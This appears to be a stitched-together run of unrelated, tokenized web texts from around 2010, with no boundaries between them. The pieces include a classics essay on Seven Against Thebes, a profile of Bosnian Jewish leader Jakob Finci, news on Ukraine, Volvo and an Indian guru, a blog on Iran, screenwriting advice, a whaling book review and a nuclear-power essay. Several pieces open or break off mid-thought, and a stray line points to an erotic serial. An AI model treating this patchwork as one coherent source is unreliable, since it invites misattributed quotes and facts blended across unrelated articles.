If the latter is the case , it would seem Eteocles is the perfect statesman .
He would be wholly just in defending his land and exhorting the Thebans to defend theirs : it is the case Tydeus loses .
The other enemies , shields , and counters are as follows .
Capaneus ’ “ device [ has ] a naked man that carries fire … [ and ] letters that declare ‘ I ’ll burn the city ' ” ( 432-434 ) .
This very crude Prometheus is opposed by one of “ fiery spirit , ” a “ guard ” favored of “ protecting Artemis ” ( 447-450 ) .
Eteoclus , whose name may be that of Eteocles himself , holds one where “ a man in armor mounts a ladder ’s steps to the enemy ’s town to sack it ” ( 466-467 , Orwin 191 ) .
Written on it : “ Ares himself shall not cast me from the tower ” ( 469 ) .
Eteocles defeats “ himself ” by sending out Creon ’s son : since Oedipus ’ line will cease to rule after the battle , perhaps the counter is too appropriate .
Hippomedon fights with a depiction of Typho , a monster of the Earth , who generates some fire but mainly smoke , surrounded by coiling snakes ( ll. 490-500 , Orwin 191 ) .
Against him is placed one who carries Zeus on his shield .
Parthenopaeus equips himself with a picture of the Sphinx and a man who might be Oedipus ( ll. 539-545 ) .
The personal significance of that shield does not matter for Eteocles , for he sends the brother of the one who fights with Zeus embossed to fight him .
A “ prophet , ” Amphiaraus , who fights alongside Tydeus and Polyneices , also questions them and their cause harshly ; no emblem is on his shield .
A prince “ in mind an old man ” – perhaps a prudent man – dispatches the prophet ( ll. 621-622 ) .
It is Polyneices ’ shield for which Eteocles has no answer .
Something is faulty with saying the earth alone is the locus of justice .
Men do not merely spring from the earth ; they are born of women ( Orwin 195 - 6 ) .
Yet before Eteocles dispatches men to attack the invaders , he tries to get the women of the city under control .
They were too shrill , too fearful , too forthright in their piety .
Eteocles demonstrates to them that statesmanship matters , that to plead too violently is not attending properly to the city the gods have helped establish .
The shields of those surrounding the city display monsters , non-Olympian forces which threaten to destroy society .
But we know Eteocles was not the most sensitive to social graces when exiling his own brother .
The question is to what degree Eteocles ’ effectiveness in the public realm threatens the very existence of the private .
Polyneices ’ shield :
He [ Polyneices ] bears a new - made , rounded shield
and a twofold device contrived thereon :
a woman leading modestly a man
conducts him , pictured as a warrior ,
wrought all in gold .
She claims she is Justice ,
and the inscription reads : I will bring him home
and he shall have his city and shall walk
in his ancestral house .
( 642-650 )
Eteocles is unjust in that he can rule well : to rule by means of merit only is not necessarily legitimate .
The character of the injustice attacks the private in this case ( Oedipus demonstrates the problem of effective rule and impiety with regards to what is public ) .
Impiety is certainly a problem here , but more pressing is whether the city can make room for the family .
After the battle is done , Antigone appears and voices purely familial concern for the burial of Polyneices ( Orwin 194 ) .
The Chorus of women , after many laments and some arguing , divides thus :
1st half Chorus :
Let the state do or not
what it will to the mourners of Polyneices .
We will go and bury him ;
we will go as his escort .
This grief is common to the race
but now one way and now another
the city approves the path of justice .
2nd half Chorus :
But we will go with the other [ Eteocles ] , as the city
and Justice jointly approve .
For after the Blessed Ones and strength of Zeus
he is the one who saved the city
from utter destruction , from being overwhelmed
by the wave of foreign invaders .
( ll. 1065 - end )
The split and the potentially deadly tension are obvious .
But it is the unity which is interesting .
“ Now one way and now another / the city approves the path of justice ” – this is not relativism .
Injustice towards individuals , families , groups are things the city aims to prevent .
Polyneices , at the end , is attended by justice , at home .
The fact of the city , justice as rooted in the soil , has its claim too .
But Eteocles is praised for saving the city , not ruling rightfully .
The claims of preventing injustice and working imperfectly for justice are reconciled in the women of the Chorus .
As proved by the opening , they are not averse to sacrifice , especially not when they see what is right .
References
Aeschylus , “ Seven against Thebes . ” tr. David Grene .
The Complete Greek Tragedies : Aeschylus II , ed. Grene and Lattimore .
Chicago : University of Chicago Press , 1991 .
Orwin , Clifford .
“ Feminine Justice : The End of the Seven Against Thebes . ” Classical Philology Vol. 75 , No. 3 ( July 1980 ) : 187-196
Read more posts by the author of Absolute Hot Sister # 19 – First Night part 9 ,
This is the new update .
It ’s a bit late , I had some projects that took all my energy .
So here we go
From the Jewish hillside cemetery , where Jakob Finci 's ancestors lie buried , the sightlines down into central Sarajevo are clear .
It is easy to see why it became a strategic post for Bosnian Serb gunners and snipers as they surrounded the city with a ring of firepower in April 1992 , at the start of the longest siege of a major city in modern history .
It was Finci 's charity , Benevolencija , that spearheaded early efforts to get medical supplies to the population , and it eventually became the only local organisation delivering humanitarian relief on a non-sectarian basis .
Few dared approach the Serb checkpoints for fear of summary execution .
But Benevolencija found a way to get people out , by organising mixed convoys of Muslim , Croat and Serb families .
" We somehow managed to get clearance from all the parties , " Finci tells me , shaking his head as if he still does n't quite believe it .
" We got permission from the Bosnian government for people to leave , negotiated safe passage from the Serbs , and entry to Croatia . "
In all , they got more than 3,000 people to safety .
After the war ended with the US - brokered Dayton peace agreement , Finci became one of Bosnia 's most respected public figures .
He was elected to chair a national committee charged with setting up a truth and reconciliation commission , and was appointed head of the civil service agency .
But his political career was eventually blocked , in such a devastating fashion that he has now taken his own government to the European court of human rights .
For under the Dayton constitution , Finci is barred from standing for the Bosnian parliament 's upper house or the presidency for one simple reason : he is a Jew .
Of the community of Sephardi Jews who had first settled in Sarajevo in the mid-16th century , most did not survive the second world war .
Finci himself was born in 1943 in an Italian concentration camp .
After Italy 's armistice with the Allies , the newborn Jakob was evacuated with his parents .
Then , in 1991 , war returned to the Balkans .
Benevolencija had been an old Jewish cultural and welfare organisation , and it was re-established in Sarajevo with Finci as vice - president .
As the conflict spread from Slovenia to Croatia , they managed to get medicine through to a small group of elderly Jews trapped in besieged Dubrovnik .
Finci wags his finger : " We learned our lesson .
Back in Sarajevo , we started to stockpile medicines and later food – tinned food , pasta , rice , oil – enough to last a winter . "
When the first shots were fired in the Bosnian war in April 1992 , they immediately organised the first evacuation of children and the elderly .
Half of the 1,400 - strong Jewish community left , " but many said they could not run again " .
When the former Bosnian Serb leader Radovan Karadzic went on trial in The Hague recently , the prosecutor described Karadzic 's vision of a greater Serb republic carved out of an ethnically divided Bosnia .
On the eve of the war , Karadzic had warned : " Sarajevo will be a karakazan , a black cauldron , where 300,000 Muslims will die . . .
Europe will be told to go fuck itself , not to come back until the job is finished . "
" At the start of the siege of Sarajevo , everything was looted , " Finci says .
" But we still had more drugs than we needed because most of our elders had left .
As we had always lived with the other communities , we decided to share everything with them . "
Benevolencija opened a free pharmacy , which eventually supplied more than 40 % of the medical needs of the population .
" People used to say , ' If you can't find it in the Jewish pharmacy , it is n't in Sarajevo , ' " says Finci proudly .
Benevolencija also opened a soup kitchen , serving 300 hot meals a day , seven days a week , for anyone who turned up .
It also began a Sunday school for 20 Jewish kids .
Finci smiles and says , " One boy would ask if he could bring along his best friend , and we soon ended up with 50 ' best friends ' from all the different communities .
We taught them about living together . "
Benevolencija's Jewish identity made it acceptable to Bosnian Muslims , Serbs and Croats alike , and also constituted a token of neutrality in the negotiations to evacuate people from the city .
Finci recalls wryly the " new Jews " who appeared , people who suddenly discovered their Jewish heritage .
He also remembers one Muslim couple who turned to him for help when they could n't get out .
" My own parents had died years before , but their ages were about the same .
So I dug out some old documents to give to the couple – now the records show that my mother and father left Sarajevo during the siege . "
The 1995 Dayton peace agreement was regarded as a coup for American diplomacy and a personal triumph for the chief negotiator , Richard Holbrooke .
When the leaders of the three main communities could n't agree who would control a particular institution , Holbrooke 's solution was to give them one each .
The state of Bosnia and Herzegovina now has two territories , the Republika Srpska and the Bosniak - Croat Federation , three prime ministers , and a rotating three - person presidency .
Membership in the upper house of parliament is reserved for equal numbers of Bosnian Muslims , Croats and Serbs .
Other groups , including Jews and the Roma , are effectively excluded from the highest offices .
Finci says that he met Holbrooke several times , both before and after Dayton .
" I asked him why I could n't stand for election like everyone else .
He said , ' This is nothing against you , but it was the first thing the three agreed on – to share power . ' "
Holbrooke is now President Obama 's envoy to Afghanistan and Pakistan .
Minority Rights Group International has supported Finci in bringing a case to Strasbourg for breach of the European convention on human rights .
The court ruled at the end of last year that no exclusion based " on a person 's ethnic origin is capable of being objectively justified in a contemporary democratic society " .
The judgment effectively requires the constitution be amended before an electoral deadline at the end of this month , and comes at a critical time for Bosnia as it seeks to join the EU .
But earlier attempts to reform the constitution failed to get agreement from the different groups .
Paddy Ashdown , the international community 's high representative for Bosnia and Herzegovina until 2006 , likes to point out that Dayton was a good agreement to end a war but a bad agreement to build a state .
Fracturing power between the three peoples has left state institutions feeble and at the mercy of a system of vetoes , while creating electoral incentives for politicians to appeal to narrow nationalist sentiments .
When I spoke to Ashdown recently , he was frustrated at the EU 's failure to insist on reform .
He says the Bosnian Serb leadership is trying to sabotage the country 's political unity and reform of the constitution in order to secure effective independence for the Republika Srpska .
" Europe is sweeping the problems under the carpet , just as we did in 1992 .
The EU will be left with a black hole of corruption and a dysfunctional state in the heart of Europe , or the country will split apart .
And we will be caught twiddling our thumbs while the policy of Karadzic comes to pass . "
Finci is more optimistic about Bosnia 's multi-ethnic future .
But he says : " The constitution we have now is not good enough – we need to have equal rights for all .
Roma and Jews are not second - class citizens . "
He thinks some 40 % of the Jews who fled the siege returned after the war .
He currently serves as Bosnia 's ambassador to Switzerland , and is still president of Benevolencija , now running a large cross-community programme for isolated elderly people .
" I am the first member of my family in 350 years not born in Sarajevo .
But I hope I wo n't be the last to be buried here . "
His two sons live in the US , and he knows he has to let them decide for themselves .
But the old Jewish cemetery , damaged by shelling and then mined , has been restored .
Finci's own parents returned with him to Sarajevo after the second world war .
He shrugs .
" When Israel was founded , many talked of emigrating , but my parents did n't want to go .
They said , ' We just came home . ' "
• Mark Lattimer is director of Minority Rights Group International
This article is more than 10 years old
This article is more than 10 years old
It is a country riven by bitter division , seething political conflict and furious tempers .
Not Britain , but less genteel Ukraine , where parliamentarians today staged one of the most memorable brawls of recent times , involving eggs , fists , smoke bombs and an umbrella used as a shield .
Ukraine 's parliament erupted when parliamentarians were asked to vote on a controversial law allowing Russia to continue to use a naval base in Crimea .
Opposition MPs oppose the move by Ukraine 's new pro-Russian president , Viktor Yanukovych , describing it as a betrayal .
As scuffles broke out , nationalist MPs unfurled the Ukrainian flag .
They then began pelting the speaker , Volodymyr Lytvyn , with eggs .
As bodyguards protected him with two umbrellas , Yanukovych 's supporters joined in , slapping and punching one hapless MP .
Smoke then filled the chamber .
The clashes symbolise the split between Ukraine 's Russian - speaking east and south and Ukrainian west and centre .
These divisions , though sometimes exaggerated , have worsened since Yanukovych 's narrow victory in February 's election .
Soon after winning , Yanukovych torpedoed the coalition of his defeated Orange rival , Yulia Tymoshenko , luring MPs away from her government .
" Today will go down as a black page in the history of Ukraine and the Ukrainian parliament , " Tymoshenko said in parliament .
She vowed to tear up the deal with Russia as soon as she was returned to power .
Her party accuses the new government of selling Ukraine 's sovereignty – with deputies today shouting " betrayal " , " traitor " and " impeachment " .
Yanukovych this week agreed to extend the lease to Russia 's Black Sea fleet on the Crimean port of Sevastopol for 25 years , until 2042 .
In return , the Kremlin has given Ukraine a 30 % discount on its gas bill .
Despite promising to pursue a foreign policy on many fronts , and eventually EU membership , Yanukovych has swiftly returned Ukraine to Russia 's orbit .
He has so far made no concessions to the western half of the country .
His pro-western predecessor Viktor Yushchenko had promised to evict Russia from Sevastopol when the original lease expired in 2017 .
Russia 's prime minister , Vladimir Putin – no fan of Ukrainian nationalism – described the egg - throwers as hooligans .
“ This is all about Geely ’s efforts to bust out of the basement , ” Mr. Dunne said .
“ Volvo happens to be available . ”
Many automakers in China are loaded with ambition , but Geely Auto stands out even by Chinese standards .
While making most of its money on inexpensive compacts and subcompacts , it has turned heads at auto shows with ambitious concept cars that look like Western sports cars and even Rolls - Royces .
Last fall , Ford said that Geely was the preferred bidder for Volvo , but there were a number of problems that needed to be overcome , including ones involving trade secrets , financing and the initial hostility of Swedish labor and political leaders .
In late December , the two had settled on most of the details of a deal , but financing and government approvals remained to be completed .
The parent company has said repeatedly that it planned to keep Volvo as a separate unit from Geely Auto .
The company promised again on Sunday to retain Volvo ’s existing management , but according to people in the industry , the company had already hired several executives with international automotive experience to help it oversee the new subsidiary .
Zhejiang Geely is dominated by its founder , Li Shufu , the son of farmers from Taizhou , in southeastern China , who turned a small business building motorcycle parts there into one of China ’s fastest - growing companies .
“ I want to emphasize that Volvo is Volvo and Geely is Geely — Volvo will be run by Volvo management , ” Mr. Li said on Sunday at a news conference in Goteborg , Sweden .
“ We are determined to preserve the distinct identity of the Volvo brand . ”
Having been scared last year by the near collapse of Saab , Sweden has acquiesced to the sale of Volvo to the Chinese buyer .
Rifleman James McKie , a 29 - year - old British soldier , has been hailed as a hero after saving the lives of two others as he picked up and threw back a grenade which landed near them .
He said the grenade landed near the three men while they were situated on a rooftop in the Sangin area .
" I dived forward , picked up the grenade and threw it off the roof , " Rifleman McKie said .
" I was n't prepared to see another guy from my platoon get hurt , even if that meant I got hurt myself , " he said .
The rifleman , who is originally from New Zealand , has been fighting in Sangin for the past five months .
The BBC's Caroline Wyatt spoke to him about the incident .
More hype about Iran ?
Back when I started writing this blog , I warned that the idea of preventive war against Iran was n’t going to go away just because Barack Obama was president .
The topic got another little burst of oxygen over the past few days , in response to what seems to have been an over - hyped memorandum from Secretary of Defense Robert Gates and some remarks by the chairman of the joint chiefs of staff , Adm .
Michael Mullen , following a speech at Columbia University .
In particular , Mullen noted that military action against Iran could " go a long way " toward delaying Iran ’s acquisition of a weapons capability , though he also noted this could only be a " last resort " and made it clear it was not an option he favored .
One of the more remarkable features about the endless drumbeat of alarm about Iran is that it pays virtually no attention to Iran ’s actual capabilities , and rests on all sorts of worst case assumptions about Iranian behavior .
Consider the following facts , most of them courtesy of the 2010 edition of The Military Balance , published annually by the prestigious International Institute for Strategic Studies in London :
GDP : United States — 13.8 trillion
Iran –$ 359 billion ( U.S. GDP is roughly 38 times greater than Iran’s )
Defense spending ( 2008 ) :
U.S. — $ 692 billion
Iran — $ 9.6 billion ( U.S. defense budget is over 70 times larger than Iran )
Military personnel :
U.S. –1,580,255 active ; 864,547 reserves ( very well trained )
Iran– 525,000 active ; 350,000 reserves ( poorly trained )
Combat aircraft :
U.S. — 4,090 ( includes USAF , USN , USMC and reserves )
Iran — 312 ( serviceability questionable )
Main battle tanks :
U.S. — 6,251 ( Army + Marine Corps )
Iran — 1,613 ( serviceability questionable )
Navy :
U.S. — 11 aircraft carriers , 99 principal surface combatants , 71 submarines , 160 patrol boats , plus large auxiliary fleet
Iran — 6 principal surface combatants , 10 submarines , 146 patrol boats
Nuclear weapons :
U.S. — 2,702 deployed , >6,000 in reserve
Iran — Zero
One might add that Iran has n’t invaded anyone since the Islamic revolution , although it has supported a number of terrorist organizations and engaged in various forms of covert action .
The United States has also backed terrorist groups and conducted covert ops during this same period , and attacked a number of other countries , including Panama , Grenada , Serbia , Sudan , Somalia , Iraq ( twice ) , and Afghanistan .
By any objective measure , therefore , Iran is n’t even on the same page with the United States in terms of latent power , deployed capabilities , or the willingness to use them .
Indeed , Iran is significantly weaker than Israel , which has roughly the same toal of regular plus reserve military personnel and vastly superior training .
Israel also has more numerous and modern armored and air capabilities and a sizeable nuclear weapons stockpile of its own .
Iran has no powerful allies , scant power - projection capability , and little ideological appeal .
Despite what some alarmists think , Iran is not the reincarnation of Nazi Germany and not about to unleash some new Holocaust against anyone .
The more one thinks about it , the odder our obsession with Iran appears .
It ’s a pretty unloveable regime , to be sure , but given Iran ’s actual capabilities , why do U.S. leaders devote so much time and effort trying to corral support for more economic sanctions ( which are n’t going to work ) or devising strategies to " contain " an Iran that shows no sign of being able to expand in any meaningful way ?
Even the danger that a future Iranian bomb might set off some sort of regional arms race seems exaggerated , according to an unpublished dissertation by Philipp Bleek of Georgetown University .
Bleek ’s thesis examines the history of nuclear acquisition since 1945 and finds little evidence for so - called " reactive proliferation . "
If he ’s right , it suggests that Iran ’s neighbors might not follow suit even if Iran did " go nuclear " at some point in the future ) .
Obviously , simple bean counts like the one presented above do not tell you everything about the two countries , or the political challenges that Iran might pose to its neighbors .
Iran has engaged in a number of actions that are cause for concern ( such as its support for Hezbollah in Lebanon ) , and it has some capacity to influence events in Iraq and Afghanistan .
Moreover , as we have learned in both of these countries , objectively weaker adversaries can still mount serious counterinsurgency operations against a foreign occupier .
And if attacked , Iran does have various retaliatory options that we would find unpleasant , such as attacking shipping in the Persian Gulf .
So Iran ’s present weakness does not imply that the United States can go ahead and bomb it with impunity .
What it does mean is that we ought to keep this relatively minor " threat " in perspective , and not allow the usual threat - inflators to stampede us into another unnecessary war .
My impression is that Admiral Mullen and SecDef Gates understand this .
I hope I ’m right .
But I ’m still puzzled as to why the Obama administration has n’t tried the one strategy that might actually get somewhere : take the threat of force off the table , tell Tehran that we are willing to talk seriously about the issues that bother them ( as well as the items that bother us ) , and try to cut a deal whereby Iran ratifies and implements the NPT Additional Protocol and is then permitted to enrich uranium for legitimate purposes ( but not to weapons - grade levels ) .
It might not work , of course , but neither will our present course of action or the " last resort " that Mullen referred to last weekend .
Pictures of the holy man were burned at earlier protests
Police in India say a controversial Hindu holy man facing charges of obscenity has been arrested .
Nithyananda Swami was detained in the northern state of Himachal Pradesh where police said he had been hiding .
The guru stepped down last month as head of a religious organisation based in the southern city of Bangalore .
His announcement came after a video apparently showing him engaging in sexual acts with two women .
He says he is innocent and the video is a fake .
Nithyananda Swami has a huge following in southern India and his mission has branches in several countries , including the US and Europe .
' Spiritual seclusion '
" Nithyananda Swami was arrested at Solan [ in Himachal Pradesh ] along with his associate Gopal Seelam Reddy and they would be brought to Bangalore soon , " the city 's director general of police , DV Guruprasaad , said .
On Tuesday , the authorities raided the swami's sprawling centre near Bangalore .
Nithyananda Swami , 32 , stepped down as leader of the global Dhyanapeetam ( Meditation Centre ) organisation soon after the police inquiry was launched .
" I have decided to live a life of spiritual seclusion for some indefinite time , " the guru said in a statement .
" If required , I will return and talk about all that had happened as an independent witness to my conduct with a clean heart and pure soul and in a less prejudiced atmosphere . "
The video shocked his devotees and angered locals - his ashram near Bangalore was vandalised after TV channels broadcast the video .
The guru 's followers allege the video was created and distributed by a jealous resident of the ashram in a bid to defame him .
This petition is having a big impact on the debate !
After 140,000 petition signatures and 4,000 phone calls to Congress , we got 62 House members to join our call for a criminal investigation of Goldman Sachs .
Our petition delivery to the Justice Department was covered by CNN , CNBC , and the Wall Street Journal .
Two days later , the Justice Department announced they are launching an investigation !
We are now encouraging the Justice Department to launch MORE investigations of Wall Street giants who broke the law .
Please sign today -- and add to our momentum !
MI5 currently has around 3,500 officers and is on course to have 4,100 by next year , double its size in 2001 .
Many of the new recruits are in their 20s and 30s attracted by high - profile advertising campaigns and – in part – the BBC drama Spooks .
I was young , innocent and seduced by a mouse .
I spent 29 years working for The Company and even after I was laid off continued to work freelance doing the same work for seven more .
Held back by golden handcuffs , I fear I ’ve wasted decades to pursue greater things .
Is it too late to break in ?
Should I stop writing scripts and just take a job behind the counter at Starbucks to sell coffee ?
Should I never have considered starting to write in the first place , since clearly I was n’t driven enough at an early age ?
Hold old is too old to hold on to a dream ?
Not just screenwriting , but any dream .
— Paul
Santa Ana
“ Golden Handcuffs ” is a term I heard a few times while visiting Pixar : a job that ’s so good that you ’d be crazy to leave it .
In the case of Pixar , well , Pixar is awesome .
Get a job there , and you ’re making amazing movies with some of the brightest people you ’re going to meet anywhere .
But you ’re ultimately making Pixar ’s movies , not your movies .
The same could be said for companies in every field .
Take an anonymous survey of executive vice presidents from Fortune 500 corporations , and I bet you ’ll find a lot of MBAs who feel like failures for not starting their own ventures .
Life is choices .
In this case , which do you put first : your comfort or your ambition ?
From what you describe , Paul , you chose comfort .
And that ’s okay .
I strongly doubt you wasted decades : you had an entire life outside of work that was possible in no small part due to having a steady paycheck .
Most of America would gladly trade places with you .
On Maslow ’s hierarchy of needs , you ’re aiming for self - actualization .
That ’s good , but recognize that it ’s a comparative luxury .
Right now , you ’re playing the What If ? game , and you ’re playing it wrong .
You are never going to be able to go back and make different choices .
As Daniel Faraday would remind you , whatever happened , happened .
So stop fantasizing about scenarios in which the past 29 years might have turned out more artistically satisfying .
More importantly , stop beating up the younger version of yourself .
He was n’t lazy or naive .
He was you .
Here are your new rules for the What If ? game :
Only ask What If ? questions about the future .
What If you now devoted yourself full - time to writing ?
Or , What If you stopped carrying this torch for screenwriting , and pursued something else you enjoyed ?
Which would make you happier ?
What If you now devoted yourself full - time to writing ?
Or , What If you stopped carrying this torch for screenwriting , and pursued something else you enjoyed ?
Which would make you happier ?
Only think about the person you are today .
A 20 - year old has different options and challenges than a 49 - year old .
How much of your current life would you be willing to up - end ?
A 20 - year old has different options and challenges than a 49 - year old .
How much of your current life would you be willing to up - end ?
Recognize assumptions .
Do n’t assume you know where a path would take you .
Rather , ask whether traveling that path would be interesting and fulfilling .
Golden handcuffs do n’t really go away , incidentally .
I write movies for other directors because it ’s safe and lucrative .
And fulfilling , mostly .
I want to get movies made , and I can write many more movies than I could ever direct .
But every time I take a job writing someone else ’s movie , it pushes back my own next movie another few months .
At some point soon , I ’ll need to quit my day job to pursue my own ambitions , with all the risks that entails .
HERE WE go again .
Outgoing Ferrari President Luca di Montezemolo has openly said he wants nine - time motorcycle World Champion Valentino Rossi in a third F1 car in 2011 .
Speaking in Milan , Montezemolo said thinks Rossi has made his mark in motorcycling and now must take up the challenge of F1 :
" We want a third car and I would do everything to have Valentino , " said the Italian .
" When he wins this year 's MotoGP , enough is enough , he must also win in Formula One . "
Rossi tested for Ferrari a few months ago , posting a lap time just outside Kimi Raikkonen 's 2008 best at the Circuit de Catalunya .
Despite wowing the F1 team with his scintillating performance , Rossi has said he has no realistic chance of a future in F1 , as he deems himself too old .
Believe that one if you want to .
So , the story continues .
Will he , wo n't he ?
Few things drive people who would like to see whaling end to distraction quite as much as the lack of engagement with the issue across Japanese society .
Their argument goes like this : continuing whaling is clearly not in the best interests of Japan as a nation , raising opprobrium in countries that are otherwise its friend while gaining virtually nothing in the way of meat ; so even though whaling might be in the interests of the Fisheries Agency , which implements policies domestically and represents the country internationally , why do n't other parts of the government or wider society weigh in , stand up for their interests , and get the practice shelved ?
Activists have made such arguments long into many a frustrated night .
But still , within Japanese society , criticism of whaling is pretty much confined to the Tokyo outposts of Western NGOs .
Last year saw the publication of a book that adds something to the picture .
It 's called Whaling in Japan : Power , Politics and Diplomacy , and it 's written not by anyone from the conservation community but by a Japanese academic , Professor Jun Morikawa , who 's based at Rakuno Gakuen University near Sapporo and specialises in studying Japan 's relationship with Africa .
I read the book earlier this year , and have just been to hear the professor lecture at the School of Oriental and African Studies in London .
Summing it all up in one single blog post is not a simple task , because the thesis he outlines runs from the desks of Tokyo bureaucrats to the forests of Africa and the waters of the Antarctic .
But theses are some of the key points :
• Whaling is of no real importance to Japan , producing 0.2 % of all the meat eaten in the country
• The authorities claim to base their arguments for whaling on science , but in fact invest heavily in emotive messages - for example , that whaling is an integral part of the national culture
• There is no national culture of whaling in Japan ; there are local cultures , but there are also local cultures that regard whales as gods , where killing them would be unthinkable
• Successive governments have placed a high priority on ensuring a plentiful supply of fish through diplomacy , often building relationships with developing countries possessing productive coastal waters
• One part of these relationships is backing for Japan 's position in all aspects of international affairs , from supporting its bid for a permanent seat on the UN Security Council to voting with it in the International Whaling Commission
• The industry is perpetuated by the practice of amakudari , where retiring bureaucrats go on to take jobs in businesses that their successors are supposedly regulating
• Japan is a major consumer of all kinds of wildlife , sometimes destructively
• The status quo is helped along by a compliant media , while organisations such as Sea Shepherd also lend a hand by giving the Fisheries Agency ammunition with which to label anti-whaling groups as anti-Japanese
OK : I think I 've got most of the important bits .
Most of these arguments - even the last , behind closed doors - have been made before , but mainly by Western environmentalists .
The potential importance of Jun Morikawa 's book is that his background is not in the environmental movement , but in the academic study of politics and foreign relations ; and that he is Japanese , and of an age and status that generally garner respect .
Whereas anti-whaling sentiment is often characterised in Japan as having cultural imperialist and even racist roots , the reasoning of a Japanese professor cannot be so easily categorised .
In some ways , Whaling in Japan : Power , Politics and Diplomacy forms a counterpoint to another book published in 2008 with an even longer title - The Power of Words in International Relations : Birth of an Anti-Whaling Discourse .
If you 're thinking that this does n't sound like an easy read , you 'd be right .
It 's an unashamedly academic tome ; the author , University of Sydney - based Dr Charlotte Epstein , comes - like Jun Morikawa - from the disciplines of politics and international relations rather than biology or conservation .
What she attempts to do is to plot , through analysing the language used about whales and whaling down the years , the transformation of the whale in Western society from a real living thing that real hunters caught in the oceans to an idea , an icon - the " superwhale " , intelligent , kind , endangered - a totem of humankind 's relationship with the environment .
One of the examples in the book is an advert that ran in the Los Angeles Times of 1974 , advocating a boycott of Japanese goods .
With Dr Epstein as sushi-chef , the advert is sliced into morsels indicating how it transformed objective reality into a message better suited to the aims of the anti-whaling movement of the time - and to the US government of the time , for which Japan was the biggest economic rival and the Soviet Union the biggest military rival .
The juxtaposition of the phrases " The Japanese are the biggest whale killers " and " More than 2,000,000 whales have been killed in the last 50 years " , for example , creates the impression that Japan was responsible for that toll ; whereas history tells us that Norway and the UK played much bigger roles .
Here again : " Modern whaling is a savage , ruthless exercise , nothing like the romantic days of 19th Century whaling ... the terror - stricken whales are ... blown up in agonising death by grenade - tipped harpoons ... "
There is no evidence , however , that the whales targeted in the 19th Century lolled back with contented smiles and welcomed the hunters to throw their harpoons as soon as they realised how romantic a pursuit it was .
It wo n't have escaped your notice that the " romantic " era lauded in the US - based advert was dominated by US fleets ; and you 'll probably have realised also that grenade - tipped harpoons were designed to kill whales in a few minutes , rather than the hours to death typical during the " romantic " Yankee whaling era .
Dr Epstein follows this pattern of discourse through blow by blow , as western NGOs and Western politicians shaped an identity of whalers as people who were both cruel and - more importantly - Japanese .
The relevance to the present is that this is the genesis of the identity of whaling that still pervades Western culture , distortions and all .
If it 's hard to sum up the Morikawa book in a few sentences , it 's doubly hard with the Epstein , which is much longer and which attempts to cover two fields - whaling and the language surrounding whaling - in one go .
if you 're enticed , you 'll just have to read them .
So why might these books prove to be important ?
It is n't about whether the authors are right or wrong - some readers will find plenty to abhor in the first and love the second , other readers will have it the other way round , and often interpretations of history and definitions of the right course of environmental action are matters of opinion anyway .
Where their importance potentially lies is in bringing fresh analyses to an arena that has in recent years become sterile and entrenched , and in which both sides arguably could benefit from a little more self - reflection and a little less easy bombast .
Professor Morikawa would clearly like his book to be taken up and discussed among a wider Japanese public - many of whom , from my own experiences , do n't know anything about whaling apart from what they read in the newspapers ( the compliant newspapers , to take his critical description ) , which is mainly articles about the latest " anti-Japanese " shenanigans in the Southern Ocean .
He 'd also like to facilitate greater participation in discourse about Japan 's whaling policies across the wider political classes , empowering ministries such as Foreign Affairs , Economy and Environment to become involved in the rights and wrongs of an issue in which he believes the official definition of " the national interest " is completely at odds with reality .
For that to happen , he 'll have to publish a Japanese edition of his book - so far , he says , publishers are not queuing up to make this happen .
Charlotte Epstein's book has clearly not shifted opinion much in Australia , which remains the most implacable foe of Japanese whaling .
So perhaps Jun Morikawa 's wo n't in Japan either .
One other thing unites the two books : both will make for uncomfortable reading among the sectors that they criticise , explicitly or implicitly .
But this is part of their importance ; and so is the fact that they are both cogently - argued theses coming from outside the the circle of " usual suspects " .
Arguably , such contributions are sorely needed as we approach the June meeting at which governments inside the IWC will have to decide whether to embrace a limited , predictable amount of commercial whaling in place of the current stand - off .
By Renfrey Clarke
April 8 , 2010 --
“ When the facts change , I change my mind .
What do you do , sir ? ” Attributed to economist J.M. Keynes , that retort has always been good advice .
Now that carrying on with “ business as usual ” greenhouse gas emissions has been revealed as a road to disaster , should environmentalists change their minds on nuclear power ?
To be sure , the dangers of the nuclear industry have not gone away .
A major nuclear war , by creating “ nuclear winter ” conditions , would end most life on Earth .
Humanity , however , has managed the threat of nuclear war in the past , and the chances are that we will continue to do so .
If thousands of nuclear power reactors were in operation , reactor accidents would be frequent enough that they would almost stop being news .
But deaths would probably be few , and other losses would be relatively minor compared to the dead oceans and scorched grainlands of the greenhouse future .
Consequently , it is not surprising that some prominent climate scientists have called for massive investment in nuclear power as a practical way to replace fossil - fuelled energy generation .
“ Going nuclear ” is a key recommendation of renowned US climatologist James Hansen , head of NASA ’s climate change research unit , who toured Australia in March .
Among Australian climate scientists , an outspoken nuclear advocate is Adelaide University ’s Professor Barry Brook .
Characteristically nuanced in his approach , Hansen poses nuclear power as one element in a policy triad that also includes economising in energy use and developing renewable energy sources .
Nuclear power is indispensable , he argues , because the combination of economising and renewables will simply not meet energy demand , especially considering the need for rapid expansion of supply in developing countries .
Voicing no particular support for the current “ second - generation ” nuclear technology , Hansen instead calls for a combination of the ( inherently safer ) generations three and four .
Third - generation reactors are in essence evolved versions of the pressurised - water installations that provide almost all of today ’s nuclear energy .
Now being built for the first time , “ third - generation ” plants are arguably still at the pre-commercial stage .
The technology of fourth - generation plants is very different , and these installations exist only in concept .
Various experimental reactors , however , have provided insights into problems that the “ fourth generation ” will likely encounter .
With a variety of “ passive ” safety features , designed to make them shut down without human intervention in the event of accidents , third - and fourth - generation reactors should in theory have an incidence of contained core meltdown in the one - in - millions - of - years range .
But in third - generation installations , at least , other dangers and drawbacks of second - generation plants will persist .
Like their forebears , third - generation reactors require energy - hungry enrichment of their uranium fuel , and induce fission in only about 1 per cent of it .
As the world ’s limited reserves of high - grade uranium ores are used up , these inefficiencies will make the greenhouse abatement advantages of third - generation plants increasingly unimpressive .
Again like their precursors , third - generation reactors produce fiercely radioactive wastes that must be locked away from the environment for more than 100,000 years .
Scores of thousands of tonnes of high - level waste are now in limited - term storage at reactor sites around the world .
Plutonium in the waste from third - generation reactors can be extracted and used to create nuclear weapons .
A further danger is the possibility that ill - guarded waste could be stolen and used to make so - called dirty bombs , from which high explosives would disperse radioactive material .
Immature technology
When a technology is immature – as is the case with third - generation nuclear power generation – the time needed to make it fully operational is always an important question .
And when the task is to replace fossil - fuelled energy generation , the timeframes for perfecting the new equipment and building it out are critically short .
Just how short emerges from work performed by James Hansen himself .
If a basically recognisable natural world is to survive , the US climatologist has concluded , atmospheric carbon dioxide must be cut by the end of the century to a level below 350 parts per million ( ppm ) .
